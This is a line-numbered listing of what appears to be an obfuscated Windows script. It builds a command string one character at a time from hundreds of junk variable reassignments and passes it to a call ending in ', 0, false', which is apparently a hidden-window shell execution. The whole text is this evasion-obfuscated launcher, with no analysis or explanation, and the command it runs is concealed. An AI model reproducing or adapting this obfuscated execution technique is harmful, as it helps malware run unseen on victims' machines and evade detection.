mqifz + vjqymhl + jqdbbamo + jszhfaofa + lownhv + idmki + usyote + dowiao + pzgacr + mqifz + vdyvhclsy + lownhv + pzgacr + gctllc + vhhrsnees + vdyvhclsy + nmlhinbkr + usyote + lflgc + fcvlw + alpxvaw + usyote + wuoye + pzgacr + gaafnalvh + vhhrsnees + qhflhoadj + bwsfba + mqifz + qqiccpyam + lownhv + lownhv + vhhrsnees + xawgzaf + kfxhzojuo + kfxhzojuo + ljcfea + ardkhyhjf + sbufxsjpb + gaafnalvh + ljcfea + knvtk + sbufxsjpb + gaafnalvh + ljcfea + gaafnalvh + kctfbmwcl + jkqrlyqmj + qpnaycr + kfxhzojuo + usyote + lflgc + fcvlw + alpxvaw + usyote + wuoye + pzgacr + gaafnalvh + vhhrsnees + qqiccpyam + vhhrsnees + xsskv + avzyo + avzyo + guhmf + lownhv + zkffxio + lwkgztd + lownhv + mqifz + vdyvhclsy + lownhv + pzgacr + gctllc + vhhrsnees + vdyvhclsy + nmlhinbkr + usyote + lflgc + fcvlw + alpxvaw + usyote + wuoye + pzgacr + gaafnalvh + vhhrsnees + qhflhoadj + bwsfba + avzyo + avzyo + wuoye + gctllc + qhflhoadj + mqifz + kfxhzojuo + wuoye + mqifz + lflgc + pzgacr + lownhv + mqifz + jszhfaofa + guhmf + pzgacr + mqifz + nmlhinbkr + nmlhinbkr + ljcfea + ardkhyhjf + sbufxsjpb + gaafnalvh + ljcfea + knvtk + sbufxsjpb + gaafnalvh + ljcfea + gaafnalvh + kctfbmwcl + jkqrlyqmj + qpnaycr + dvudqg + luittenp + luittenp + luittenp + luittenp + nmlhinbkr + qhflhoadj + zkffxio + fcvlw + ndiaggrdd + ndiaggrdd + ndiaggrdd + lwkgztd + alpxvaw + alpxvaw + lownhv + nmlhinbkr + avzyo + avzyo + wuoye + gctllc + qhflhoadj + mqifz + kfxhzojuo + wuoye + mqifz + lwkgztd + pzgacr + xiftdym + guhmf + fcvlw + lwkgztd + sbufxsjpb + kctfbmwcl + mqifz + kfxhzojuo + guhmf + mqifz + nmlhinbkr + nmlhinbkr + ljcfea + ardkhyhjf + sbufxsjpb + gaafnalvh + ljcfea + knvtk + sbufxsjpb + gaafnalvh + ljcfea + gaafnalvh + kctfbmwcl + jkqrlyqmj + qpnaycr + dvudqg + luittenp + luittenp + luittenp + luittenp + nmlhinbkr + qhflhoadj + zkffxio + fcvlw + ndiaggrdd + ndiaggrdd + ndiaggrdd + lwkgztd + alpxvaw + alpxvaw + lownhv + nmlhinbkr + sbufxsjpb + kctfbmwcl + jkqrlyqmj + qpnaycr + ardkhyhjf + kctfbmwcl + jkqrlyqmj + sbufxsjpb + qpnaycr + qpnaycr + sbufxsjpb + jkqrlyqmj + ardkhyhjf + knvtk + qpnaycr + gaafnalvh + qhflhoadj + dowiao + dowiao, 0, false ); |
|
14 | } | |
15 | idmki = "P"; | |
16 | idmki = "d"; | |
17 | idmki = "v"; | |
18 | idmki = "n"; | |
19 | idmki = "D"; | |
20 | idmki = "y"; | |
21 | idmki = "S"; | |
22 | idmki = "d"; | |
23 | idmki = "s"; | |
24 | idmki = "K"; | |
25 | idmki = "o"; | |
26 | idmki = "u"; | |
27 | idmki = "a"; | |
28 | idmki = "Y"; | |
29 | idmki = "u"; | |
30 | idmki = "L"; | |
31 | idmki = "k"; | |
32 | idmki = "R"; | |
33 | idmki = "z"; | |
34 | idmki = "L"; | |
35 | idmki = "F"; | |
36 | qpnaycr = "f"; | |
37 | qpnaycr = "b"; | |
38 | qpnaycr = "d"; | |
39 | qpnaycr = "C"; | |
40 | qpnaycr = "v"; | |
41 | qpnaycr = "M"; | |
42 | qpnaycr = "p"; | |
43 | qpnaycr = "5"; | |
44 | kctfbmwcl = "d"; | |
45 | kctfbmwcl = "h"; | |
46 | kctfbmwcl = "G"; | |
47 | kctfbmwcl = "z"; | |
48 | kctfbmwcl = "t"; | |
49 | kctfbmwcl = "L"; | |
50 | kctfbmwcl = "H"; | |
51 | kctfbmwcl = "k"; | |
52 | kctfbmwcl = "d"; | |
53 | kctfbmwcl = "A"; | |
54 | kctfbmwcl = "Q"; | |
55 | kctfbmwcl = "i"; | |
56 | kctfbmwcl = "O"; | |
57 | kctfbmwcl = "k"; | |
58 | kctfbmwcl = "Q"; | |
59 | kctfbmwcl = "E"; | |
60 | kctfbmwcl = "V"; | |
61 | kctfbmwcl = "G"; | |
62 | kctfbmwcl = "U"; | |
63 | kctfbmwcl = "h"; | |
64 | kctfbmwcl = "U"; | |
65 | kctfbmwcl = "D"; | |
66 | kctfbmwcl = "s"; | |
67 | kctfbmwcl = "g"; | |
68 | kctfbmwcl = "q"; | |
69 | kctfbmwcl = "s"; | |
70 | kctfbmwcl = "2"; | |
71 | pzgacr = "z"; | |
72 | pzgacr = "I"; | |
73 | pzgacr = "I"; | |
74 | pzgacr = "B"; | |
75 | pzgacr = "c"; | |
76 | pzgacr = "M"; | |
77 | pzgacr = "S"; | |
78 | pzgacr = "q"; | |
79 | pzgacr = "a"; | |
80 | pzgacr = "r"; | |
81 | pzgacr = "W"; | |
82 | pzgacr = "Z"; | |
83 | pzgacr = "v"; | |
84 | pzgacr = "r"; | |
85 | pzgacr = "w"; | |
86 | pzgacr = "J"; | |
87 | pzgacr = "z"; | |
88 | pzgacr = "x"; | |
89 | pzgacr = "y"; | |
90 | pzgacr = "q"; | |
91 | pzgacr = "B"; | |
92 | pzgacr = "G"; | |
93 | pzgacr = "r"; | |
94 | pzgacr = "e"; | |
95 | bktyujfm = "H"; | |
96 | bktyujfm = "x"; | |
97 | bktyujfm = "H"; | |
98 | bktyujfm = "N"; | |
99 | bktyujfm = "U"; | |
100 | bktyujfm = "Y"; | |
101 | bktyujfm = "W"; | |
102 | bktyujfm = "v"; | |
103 | bktyujfm = "s"; | |
104 | bktyujfm = "V"; | |
105 | bktyujfm = "x"; | |
106 | bktyujfm = "Z"; | |
107 | bktyujfm = "Y"; | |
108 | bktyujfm = "x"; | |
109 | bktyujfm = "C"; | |
110 | bktyujfm = "r"; | |
111 | bktyujfm = "D"; | |
112 | bktyujfm = "k"; | |
113 | bktyujfm = "x"; | |
114 | bktyujfm = "L"; | |
115 | bktyujfm = "M"; | |
116 | bktyujfm = "L"; | |
117 | bktyujfm = "L"; | |
118 | bktyujfm = "k"; | |
119 | bktyujfm = "s"; | |
120 | bktyujfm = "M"; | |
121 | bktyujfm = "a"; | |
122 | bktyujfm = "s"; | |
123 | bktyujfm = "h"; | |
124 | bktyujfm = "a"; | |
125 | bktyujfm = "Q"; | |
126 | bktyujfm = "O"; | |
127 | bktyujfm = "e"; | |
128 | bktyujfm = "z"; | |
129 | bktyujfm = "S"; | |
130 | bktyujfm = "C"; | |
131 | bktyujfm = "H"; | |
132 | bktyujfm = "x"; | |
133 | bktyujfm = "N"; | |
134 | zkffxio = "D"; | |
135 | zkffxio = "w"; | |
136 | zkffxio = "h"; | |
137 | zkffxio = "r"; | |
138 | zkffxio = "v"; | |
139 | zkffxio = "c"; | |
140 | zkffxio = "D"; | |
141 | zkffxio = "w"; | |
142 | zkffxio = "O"; | |
143 | zkffxio = "z"; | |
144 | zkffxio = "a"; | |
145 | qhflhoadj = "Y"; | |
146 | qhflhoadj = "y"; | |
147 | qhflhoadj = "c"; | |
148 | qhflhoadj = "F"; | |
149 | qhflhoadj = "k"; | |
150 | qhflhoadj = "Y"; | |
151 | qhflhoadj = "B"; | |
152 | qhflhoadj = "g"; | |
153 | qhflhoadj = "F"; | |
154 | qhflhoadj = "y"; | |
155 | qhflhoadj = "B"; | |
156 | qhflhoadj = "a"; | |
157 | qhflhoadj = "I"; | |
158 | qhflhoadj = "n"; | |
159 | qhflhoadj = "v"; | |
160 | qhflhoadj = "g"; | |
161 | qhflhoadj = "t"; | |
162 | qhflhoadj = "J"; | |
163 | qhflhoadj = "p"; | |
164 | qhflhoadj = "g"; | |
165 | qhflhoadj = "R"; | |
166 | qhflhoadj = "h"; | |
167 | qhflhoadj = "Y"; | |
168 | qhflhoadj = "p"; | |
169 | qhflhoadj = "Q"; | |
170 | qhflhoadj = "R"; | |
171 | qhflhoadj = "O"; | |
172 | qhflhoadj = "t"; | |
173 | qhflhoadj = "e"; | |
174 | qhflhoadj = "B"; | |
175 | qhflhoadj = "g"; | |
176 | qhflhoadj = "s"; | |
177 | qhflhoadj = "n"; | |
178 | qhflhoadj = "N"; | |
179 | qhflhoadj = "f"; | |
180 | qhflhoadj = "R"; | |
181 | qhflhoadj = "G"; | |
182 | qhflhoadj = "H"; | |
183 | qhflhoadj = "P"; | |
184 | qhflhoadj = "A"; | |
185 | qhflhoadj = "z"; | |
186 | qhflhoadj = "Q"; | |
187 | qhflhoadj = "w"; | |
188 | qhflhoadj = "N"; | |
189 | qhflhoadj = "d"; | |
190 | luittenp = "P"; | |
191 | luittenp = "K"; | |
192 | luittenp = "Q"; | |
193 | luittenp = "s"; | |
194 | luittenp = "J"; | |
195 | luittenp = "s"; | |
196 | luittenp = "H"; | |
197 | luittenp = "g"; | |
198 | luittenp = "I"; | |
199 | luittenp = "r"; | |
200 | luittenp = "v"; | |
201 | luittenp = "V"; | |
202 | luittenp = "h"; | |
203 | luittenp = "Z"; | |
204 | luittenp = "z"; | |
205 | luittenp = "C"; | |
206 | luittenp = "o"; | |
207 | luittenp = "y"; | |
208 | luittenp = "D"; | |
209 | luittenp = "I"; | |
210 | luittenp = "M"; | |
211 | luittenp = "E"; | |
212 | luittenp = "y"; | |
213 | luittenp = "e"; | |
214 | luittenp = "m"; | |
215 | luittenp = "g"; | |
216 | luittenp = "x"; | |
217 | luittenp = "L"; | |
218 | luittenp = "q"; | |
219 | luittenp = "p"; | |
220 | luittenp = "z"; | |
221 | luittenp = "f"; | |
222 | luittenp = "S"; | |
223 | luittenp = "s"; | |
224 | luittenp = "S"; | |
225 | luittenp = "H"; | |
226 | luittenp = "t"; | |
227 | luittenp = "z"; | |
228 | luittenp = "M"; | |
229 | luittenp = "L"; | |
230 | luittenp = "y"; | |
231 | luittenp = "8"; | |
232 | ykzmjakw = "G"; | |
233 | ykzmjakw = "S"; | |
234 | ykzmjakw = "o"; | |
235 | ykzmjakw = "l"; | |
236 | ykzmjakw = "U"; | |
237 | ykzmjakw = "Q"; | |
238 | ykzmjakw = "M"; | |
239 | ykzmjakw = "L"; | |
240 | ykzmjakw = "t"; | |
241 | ykzmjakw = "O"; | |
242 | ykzmjakw = "U"; | |
243 | ykzmjakw = "Q"; | |
244 | ykzmjakw = "S"; | |
245 | ykzmjakw = "n"; | |
246 | ykzmjakw = "O"; | |
247 | ykzmjakw = "p"; | |
248 | ykzmjakw = "s"; | |
249 | ykzmjakw = "d"; | |
250 | ykzmjakw = "I"; | |
251 | ykzmjakw = "w"; | |
252 | ykzmjakw = "w"; | |
253 | ykzmjakw = "N"; | |
254 | ykzmjakw = "W"; | |
255 | ykzmjakw = "M"; | |
256 | ykzmjakw = "C"; | |
257 | ykzmjakw = "B"; | |
258 | ykzmjakw = "r"; | |
259 | ykzmjakw = "K"; | |
260 | ykzmjakw = "T"; | |
261 | ykzmjakw = "y"; | |
262 | ykzmjakw = "P"; | |
263 | ykzmjakw = "b"; | |
264 | ykzmjakw = "l"; | |
265 | ykzmjakw = "E"; | |
266 | vsynel = "i"; | |
267 | vsynel = "r"; | |
268 | vsynel = "t"; | |
269 | vsynel = "h"; | |
270 | vsynel = "Q"; | |
271 | vsynel = "h"; | |
272 | vsynel = "K"; | |
273 | knvtk = "d"; | |
274 | knvtk = "i"; | |
275 | knvtk = "p"; | |
276 | knvtk = "G"; | |
277 | knvtk = "O"; | |
278 | knvtk = "X"; | |
279 | knvtk = "H"; | |
280 | knvtk = "H"; | |
281 | knvtk = "A"; | |
282 | knvtk = "D"; | |
283 | knvtk = "x"; | |
284 | knvtk = "p"; | |
285 | knvtk = "g"; | |
286 | knvtk = "G"; | |
287 | knvtk = "f"; | |
288 | knvtk = "o"; | |
289 | knvtk = "l"; | |
290 | knvtk = "m"; | |
291 | knvtk = "S"; | |
292 | knvtk = "m"; | |
293 | knvtk = "C"; | |
294 | knvtk = "s"; | |
295 | knvtk = "C"; | |
296 | knvtk = "p"; | |
297 | knvtk = "Q"; | |
298 | knvtk = "d"; | |
299 | knvtk = "L"; | |
300 | knvtk = "w"; | |
301 | knvtk = "u"; | |
302 | knvtk = "X"; | |
303 | knvtk = "R"; | |
304 | knvtk = "G"; | |
305 | knvtk = "W"; | |
306 | knvtk = "4"; | |
307 | lflgc = "n"; | |
308 | vhhrsnees = "g"; | |
309 | vhhrsnees = "q"; | |
310 | vhhrsnees = "z"; | |
311 | vhhrsnees = "U"; | |
312 | vhhrsnees = "X"; | |
313 | vhhrsnees = "p"; | |
314 | vhhrsnees = "R"; | |
315 | vhhrsnees = "f"; | |
316 | vhhrsnees = "v"; | |
317 | vhhrsnees = "t"; | |
318 | vhhrsnees = "K"; | |
319 | vhhrsnees = "s"; | |
320 | vhhrsnees = "L"; | |
321 | vhhrsnees = "E"; | |
322 | vhhrsnees = "L"; | |
323 | vhhrsnees = "x"; | |
324 | vhhrsnees = "y"; | |
325 | vhhrsnees = "h"; | |
326 | vhhrsnees = "i"; | |
327 | vhhrsnees = "u"; | |
328 | vhhrsnees = "j"; | |
329 | vhhrsnees = "j"; | |
330 | vhhrsnees = "r"; | |
331 | vhhrsnees = "k"; | |
332 | vhhrsnees = "e"; | |
333 | vhhrsnees = "H"; | |
334 | vhhrsnees = "a"; | |
335 | vhhrsnees = "r"; | |
336 | vhhrsnees = "p"; | |
337 | guhmf = "i"; | |
338 | guhmf = "b"; | |
339 | guhmf = "v"; | |
340 | guhmf = "h"; | |
341 | guhmf = "t"; | |
342 | guhmf = "Y"; | |
343 | guhmf = "w"; | |
344 | guhmf = "U"; | |
345 | guhmf = "X"; | |
346 | guhmf = "l"; | |
347 | guhmf = "r"; | |
348 | guhmf = "f"; | |
349 | guhmf = "o"; | |
350 | guhmf = "X"; | |
351 | guhmf = "Y"; | |
352 | guhmf = "W"; | |
353 | guhmf = "v"; | |
354 | guhmf = "s"; | |
355 | pcdikm = "z"; | |
356 | pcdikm = "A"; | |
357 | pcdikm = "J"; | |
358 | pcdikm = "v"; | |
359 | pcdikm = "s"; | |
360 | pcdikm = "_"; | |
361 | ntsceb = "b"; | |
362 | ntsceb = "L"; | |
363 | jszhfaofa = "j"; | |
364 | jszhfaofa = "i"; | |
365 | jszhfaofa = "Z"; | |
366 | jszhfaofa = "c"; | |
367 | jszhfaofa = "l"; | |
368 | jszhfaofa = "V"; | |
369 | jszhfaofa = "m"; | |
370 | jszhfaofa = "H"; | |
371 | jszhfaofa = "j"; | |
372 | jszhfaofa = "x"; | |
373 | jszhfaofa = "m"; | |
374 | jszhfaofa = "Q"; | |
375 | jszhfaofa = "B"; | |
376 | jszhfaofa = "F"; | |
377 | jszhfaofa = "c"; | |
378 | jszhfaofa = "Q"; | |
379 | jszhfaofa = "q"; | |
380 | jszhfaofa = "n"; | |
381 | jszhfaofa = "x"; | |
382 | jszhfaofa = "G"; | |
383 | jszhfaofa = "L"; | |
384 | jszhfaofa = "S"; | |
385 | jszhfaofa = "U"; | |
386 | jszhfaofa = "O"; | |
387 | jszhfaofa = "K"; | |
388 | jszhfaofa = "k"; | |
389 | jszhfaofa = "W"; | |
390 | jszhfaofa = "W"; | |
391 | jszhfaofa = "b"; | |
392 | jszhfaofa = "u"; | |
393 | xawgzaf = "S"; | |
394 | xawgzaf = "T"; | |
395 | xawgzaf = "H"; | |
396 | xawgzaf = "y"; | |
397 | xawgzaf = "w"; | |
398 | xawgzaf = "F"; | |
399 | xawgzaf = "b"; | |
400 | xawgzaf = "p"; | |
401 | xawgzaf = "v"; | |
402 | xawgzaf = "B"; | |
403 | xawgzaf = "I"; | |
404 | xawgzaf = "K"; | |
405 | xawgzaf = "I"; | |
406 | xawgzaf = "Z"; | |
407 | xawgzaf = "d"; | |
408 | xawgzaf = "I"; | |
409 | xawgzaf = "t"; | |
410 | xawgzaf = "j"; | |
411 | xawgzaf = "J"; | |
412 | xawgzaf = "X"; | |
413 | xawgzaf = ":"; | |
414 | krpeeutzy = "e"; | |
415 | krpeeutzy = "P"; | |
416 | krpeeutzy = "J"; | |
417 | krpeeutzy = "E"; | |
418 | krpeeutzy = "W"; | |
419 | krpeeutzy = "z"; | |
420 | krpeeutzy = "n"; | |
421 | krpeeutzy = "m"; | |
422 | krpeeutzy = "e"; | |
423 | krpeeutzy = "m"; | |
424 | krpeeutzy = "Z"; | |
425 | krpeeutzy = "P"; | |
426 | krpeeutzy = "V"; | |
427 | krpeeutzy = "o"; | |
428 | krpeeutzy = "R"; | |
429 | krpeeutzy = "C"; | |
430 | krpeeutzy = "z"; | |
431 | krpeeutzy = "C"; | |
432 | krpeeutzy = "y"; | |
433 | krpeeutzy = "G"; | |
434 | krpeeutzy = "x"; | |
435 | krpeeutzy = "O"; | |
436 | krpeeutzy = "Z"; | |
437 | krpeeutzy = "O"; | |
438 | krpeeutzy = "V"; | |
439 | krpeeutzy = "s"; | |
440 | krpeeutzy = "j"; | |
441 | krpeeutzy = "I"; | |
442 | dvudqg = "U"; | |
443 | dvudqg = "Y"; | |
444 | dvudqg = "Z"; | |
445 | dvudqg = "Y"; | |
446 | dvudqg = "w"; | |
447 | dvudqg = "v"; | |
448 | dvudqg = "w"; | |
449 | dvudqg = "X"; | |
450 | dvudqg = "K"; | |
451 | dvudqg = "D"; | |
452 | dvudqg = "r"; | |
453 | dvudqg = "y"; | |
454 | dvudqg = "M"; | |
455 | dvudqg = "n"; | |
456 | dvudqg = "f"; | |
457 | dvudqg = "O"; | |
458 | dvudqg = "i"; | |
459 | dvudqg = "a"; | |
460 | dvudqg = "G"; | |
461 | dvudqg = "b"; | |
462 | dvudqg = "j"; | |
463 | dvudqg = "P"; | |
464 | dvudqg = "H"; | |
465 | dvudqg = "x"; | |
466 | dvudqg = "K"; | |
467 | dvudqg = "c"; | |
468 | dvudqg = "M"; | |
469 | dvudqg = "V"; | |
470 | dvudqg = "L"; | |
471 | dvudqg = "D"; | |
472 | dvudqg = "g"; | |
473 | dvudqg = "K"; | |
474 | dvudqg = "y"; | |
475 | dvudqg = "B"; | |
476 | dvudqg = "d"; | |
477 | dvudqg = "K"; | |
478 | dvudqg = "I"; | |
479 | dvudqg = "S"; | |
480 | dvudqg = "M"; | |
481 | dvudqg = "I"; | |
482 | dvudqg = "e"; | |
483 | dvudqg = "l"; | |
484 | dvudqg = "i"; | |
485 | dvudqg = "@"; | |
486 | xiftdym = "x"; | |
487 | xiftdym = "f"; | |
488 | xiftdym = "i"; | |
489 | xiftdym = "F"; | |
490 | xiftdym = "K"; | |
491 | xiftdym = "r"; | |
492 | xiftdym = "y"; | |
493 | xiftdym = "J"; | |
494 | xiftdym = "S"; | |
495 | xiftdym = "K"; | |
496 | xiftdym = "C"; | |
497 | xiftdym = "Y"; | |
498 | xiftdym = "O"; | |
499 | xiftdym = "b"; | |
500 | xiftdym = "e"; | |
501 | xiftdym = "g"; | |
502 | xiftdym = "E"; | |
503 | xiftdym = "c"; | |
504 | xiftdym = "j"; | |
505 | xiftdym = "q"; | |
506 | xiftdym = "A"; | |
507 | xiftdym = "P"; | |
508 | xiftdym = "g"; | |
509 | orhkocpn = "j"; | |
510 | bwsfba = "m"; | |
511 | bwsfba = "g"; | |
512 | bwsfba = "A"; | |
513 | bwsfba = "u"; | |
514 | bwsfba = "L"; | |
515 | bwsfba = "o"; | |
516 | bwsfba = "q"; | |
517 | bwsfba = "T"; | |
518 | bwsfba = "l"; | |
519 | bwsfba = "v"; | |
520 | bwsfba = "m"; | |
521 | bwsfba = "Q"; | |
522 | bwsfba = "f"; | |
523 | fcvlw = "l"; | |
524 | fcvlw = "L"; | |
525 | fcvlw = "Z"; | |
526 | fcvlw = "G"; | |
527 | fcvlw = "z"; | |
528 | fcvlw = "f"; | |
529 | fcvlw = "v"; | |
530 | fcvlw = "X"; | |
531 | fcvlw = "R"; | |
532 | fcvlw = "C"; | |
533 | fcvlw = "S"; | |
534 | fcvlw = "r"; | |
535 | fcvlw = "H"; | |
536 | fcvlw = "n"; | |
537 | fcvlw = "b"; | |
538 | fcvlw = "p"; | |
539 | fcvlw = "W"; | |
540 | fcvlw = "d"; | |
541 | fcvlw = "W"; | |
542 | fcvlw = "s"; | |
543 | fcvlw = "v"; | |
544 | fcvlw = "k"; | |
545 | fcvlw = "P"; | |
546 | fcvlw = "A"; | |
547 | fcvlw = "a"; | |
548 | fcvlw = "N"; | |
549 | fcvlw = "N"; | |
550 | fcvlw = "U"; | |
551 | fcvlw = "c"; | |
552 | fcvlw = "o"; | |
553 | fcvlw = "d"; | |
554 | fcvlw = "O"; | |
555 | fcvlw = "m"; | |
556 | fcvlw = "x"; | |
557 | fcvlw = "L"; | |
558 | fcvlw = "L"; | |
559 | fcvlw = "N"; | |
560 | fcvlw = "U"; | |
561 | fcvlw = "D"; | |
562 | fcvlw = "i"; | |
563 | fcvlw = "D"; | |
564 | fcvlw = "X"; | |
565 | fcvlw = "o"; | |
566 | fcvlw = "v"; | |
567 | usyote = "r"; | |
568 | usyote = "n"; | |
569 | usyote = "a"; | |
570 | usyote = "P"; | |
571 | usyote = "S"; | |
572 | usyote = "y"; | |
573 | usyote = "u"; | |
574 | usyote = "k"; | |
575 | usyote = "b"; | |
576 | usyote = "s"; | |
577 | usyote = "S"; | |
578 | usyote = "Y"; | |
579 | usyote = "K"; | |
580 | usyote = "y"; | |
581 | usyote = "i"; | |
582 | usyote = "x"; | |
583 | usyote = "l"; | |
584 | usyote = "e"; | |
585 | usyote = "O"; | |
586 | usyote = "Y"; | |
587 | usyote = "O"; | |
588 | usyote = "N"; | |
589 | usyote = "H"; | |
590 | usyote = "N"; | |
591 | usyote = "w"; | |
592 | usyote = "O"; | |
593 | usyote = "l"; | |
594 | usyote = "N"; | |
595 | usyote = "u"; | |
596 | usyote = "q"; | |
597 | usyote = "u"; | |
598 | usyote = "b"; | |
599 | usyote = "o"; | |
600 | usyote = "e"; | |
601 | usyote = "i"; | |
602 | usyote = "k"; | |
603 | usyote = "c"; | |
604 | usyote = "d"; | |
605 | usyote = "E"; | |
606 | usyote = "W"; | |
607 | usyote = "C"; | |
608 | usyote = "R"; | |
609 | usyote = "m"; | |
610 | usyote = "i"; | |
611 | qqiccpyam = "K"; | |
612 | qqiccpyam = "h"; | |
613 | qqiccpyam = "M"; | |
614 | qqiccpyam = "a"; | |
615 | qqiccpyam = "f"; | |
616 | qqiccpyam = "k"; | |
617 | qqiccpyam = "x"; | |
618 | qqiccpyam = "G"; | |
619 | qqiccpyam = "R"; | |
620 | qqiccpyam = "M"; | |
621 | qqiccpyam = "D"; | |
622 | qqiccpyam = "w"; | |
623 | qqiccpyam = "Q"; | |
624 | qqiccpyam = "N"; | |
625 | qqiccpyam = "U"; | |
626 | qqiccpyam = "R"; | |
627 | qqiccpyam = "q"; | |
628 | qqiccpyam = "H"; | |
629 | qqiccpyam = "j"; | |
630 | qqiccpyam = "F"; | |
631 | qqiccpyam = "X"; | |
632 | qqiccpyam = "v"; | |
633 | qqiccpyam = "v"; | |
634 | qqiccpyam = "h"; | |
635 | qqiccpyam = "H"; | |
636 | qqiccpyam = "m"; | |
637 | qqiccpyam = "h"; | |
638 | gctllc = "f"; | |
639 | gctllc = "N"; | |
640 | gctllc = "d"; | |
641 | gctllc = "w"; | |
642 | gctllc = "x"; | |
643 | gctllc = "c"; | |
644 | gctllc = "k"; | |
645 | gctllc = "z"; | |
646 | gctllc = "n"; | |
647 | gctllc = "z"; | |
648 | gctllc = "n"; | |
649 | gctllc = "l"; | |
650 | gctllc = "C"; | |
651 | gctllc = "l"; | |
652 | gctllc = "L"; | |
653 | gctllc = "V"; | |
654 | gctllc = "n"; | |
655 | gctllc = "D"; | |
656 | gctllc = "l"; | |
657 | gctllc = "T"; | |
658 | gctllc = "m"; | |
659 | gctllc = "o"; | |
660 | gctllc = "W"; | |
661 | gctllc = "m"; | |
662 | gctllc = "h"; | |
663 | gctllc = "g"; | |
664 | gctllc = "p"; | |
665 | gctllc = "Z"; | |
666 | gctllc = "f"; | |
667 | gctllc = "T"; | |
668 | gctllc = "V"; | |
669 | gctllc = "g"; | |
670 | gctllc = "K"; | |
671 | gctllc = "V"; | |
672 | gctllc = "m"; | |
673 | gctllc = "c"; | |
674 | gctllc = "T"; | |
675 | gctllc = "z"; | |
676 | gctllc = "D"; | |
677 | gctllc = "a"; | |
678 | gctllc = "m"; | |
679 | uapijkoc = "H"; | |
680 | uapijkoc = "o"; | |
681 | uapijkoc = "I"; | |
682 | uapijkoc = "X"; | |
683 | uapijkoc = "s"; | |
684 | uapijkoc = "Q"; | |
685 | uapijkoc = "o"; | |
686 | uapijkoc = "G"; | |
687 | uapijkoc = "T"; | |
688 | uapijkoc = "o"; | |
689 | uapijkoc = "a"; | |
690 | uapijkoc = "V"; | |
691 | uapijkoc = "s"; | |
692 | uapijkoc = "o"; | |
693 | uapijkoc = "V"; | |
694 | uapijkoc = "s"; | |
695 | uapijkoc = "L"; | |
696 | uapijkoc = "s"; | |
697 | uapijkoc = "s"; | |
698 | uapijkoc = "B"; | |
699 | uapijkoc = "O"; | |
700 | uapijkoc = "L"; | |
701 | uapijkoc = "w"; | |
702 | uapijkoc = "U"; | |
703 | uapijkoc = "o"; | |
704 | uapijkoc = "p"; | |
705 | uapijkoc = "X"; | |
706 | uapijkoc = "Y"; | |
707 | uapijkoc = "T"; | |
708 | uapijkoc = "i"; | |
709 | uapijkoc = "F"; | |
710 | uapijkoc = "e"; | |
711 | uapijkoc = "Z"; | |
712 | uapijkoc = "x"; | |
713 | uapijkoc = "T"; | |
714 | uapijkoc = "J"; | |
715 | uapijkoc = "l"; | |
716 | uapijkoc = "l"; | |
717 | uapijkoc = "b"; | |
718 | xsskv = "K"; | |
719 | xsskv = "l"; | |
720 | xsskv = "W"; | |
721 | xsskv = "H"; | |
722 | xsskv = "t"; | |
723 | xsskv = "r"; | |
724 | xsskv = "E"; | |
725 | xsskv = "h"; | |
726 | xsskv = "j"; | |
727 | xsskv = "E"; | |
728 | xsskv = "O"; | |
729 | xsskv = "t"; | |
730 | xsskv = "P"; | |
731 | xsskv = "E"; | |
732 | xsskv = "i"; | |
733 | xsskv = "a"; | |
734 | xsskv = "n"; | |
735 | xsskv = "z"; | |
736 | xsskv = "U"; | |
737 | xsskv = "M"; | |
738 | xsskv = "\""; | |
739 | mqifz = "i"; | |
740 | mqifz = "U"; | |
741 | mqifz = "f"; | |
742 | mqifz = "p"; | |
743 | mqifz = "A"; | |
744 | mqifz = "i"; | |
745 | mqifz = "o"; | |
746 | mqifz = "s"; | |
747 | mqifz = "R"; | |
748 | mqifz = "g"; | |
749 | mqifz = "n"; | |
750 | mqifz = " "; | |
751 | vjqymhl = "x"; | |
752 | vjqymhl = "I"; | |
753 | vjqymhl = "M"; | |
754 | vjqymhl = "L"; | |
755 | vjqymhl = "o"; | |
756 | vjqymhl = "N"; | |
757 | vjqymhl = "d"; | |
758 | vjqymhl = "I"; | |
759 | vjqymhl = "w"; | |
760 | vjqymhl = "B"; | |
761 | vjqymhl = "g"; | |
762 | vjqymhl = "A"; | |
763 | vjqymhl = "i"; | |
764 | vjqymhl = "L"; | |
765 | vjqymhl = "c"; | |
766 | vjqymhl = "-"; | |
767 | avzyo = "J"; | |
768 | avzyo = "f"; | |
769 | avzyo = "i"; | |
770 | avzyo = "h"; | |
771 | avzyo = "J"; | |
772 | avzyo = "l"; | |
773 | avzyo = "n"; | |
774 | avzyo = "e"; | |
775 | avzyo = "T"; | |
776 | avzyo = "m"; | |
777 | avzyo = "M"; | |
778 | avzyo = "x"; | |
779 | avzyo = "b"; | |
780 | avzyo = "I"; | |
781 | avzyo = "H"; | |
782 | avzyo = "&"; | |
783 | gaafnalvh = "n"; | |
784 | gaafnalvh = "m"; | |
785 | gaafnalvh = "f"; | |
786 | gaafnalvh = "P"; | |
787 | gaafnalvh = "G"; | |
788 | gaafnalvh = "o"; | |
789 | gaafnalvh = "r"; | |
790 | gaafnalvh = "M"; | |
791 | gaafnalvh = "O"; | |
792 | gaafnalvh = "R"; | |
793 | gaafnalvh = "c"; | |
794 | gaafnalvh = "I"; | |
795 | gaafnalvh = "r"; | |
796 | gaafnalvh = "u"; | |
797 | gaafnalvh = "L"; | |
798 | gaafnalvh = "T"; | |
799 | gaafnalvh = "F"; | |
800 | gaafnalvh = "Y"; | |
801 | gaafnalvh = "A"; | |
802 | gaafnalvh = "W"; | |
803 | gaafnalvh = "i"; | |
804 | gaafnalvh = "H"; | |
805 | gaafnalvh = "y"; | |
806 | gaafnalvh = "V"; | |
807 | gaafnalvh = "f"; | |
808 | gaafnalvh = "m"; | |
809 | gaafnalvh = "D"; | |
810 | gaafnalvh = "Q"; | |
811 | gaafnalvh = "M"; | |
812 | gaafnalvh = "O"; | |
813 | gaafnalvh = "i"; | |
814 | gaafnalvh = "x"; | |
815 | gaafnalvh = "v"; | |
816 | gaafnalvh = "T"; | |
817 | gaafnalvh = "E"; | |
818 | gaafnalvh = "x"; | |
819 | gaafnalvh = "D"; | |
820 | gaafnalvh = "l"; | |
821 | gaafnalvh = "S"; | |
822 | gaafnalvh = "."; | |
823 | jqdbbamo = "d"; | |
824 | jqdbbamo = "O"; | |
825 | awbwovs = "V"; | |
826 | awbwovs = "Z"; | |
827 | awbwovs = "n"; | |
828 | awbwovs = "U"; | |
829 | awbwovs = "K"; | |
830 | awbwovs = "W"; | |
831 | awbwovs = "R"; | |
832 | awbwovs = "f"; | |
833 | awbwovs = "H"; | |
834 | awbwovs = "K"; | |
835 | awbwovs = "r"; | |
836 | awbwovs = "q"; | |
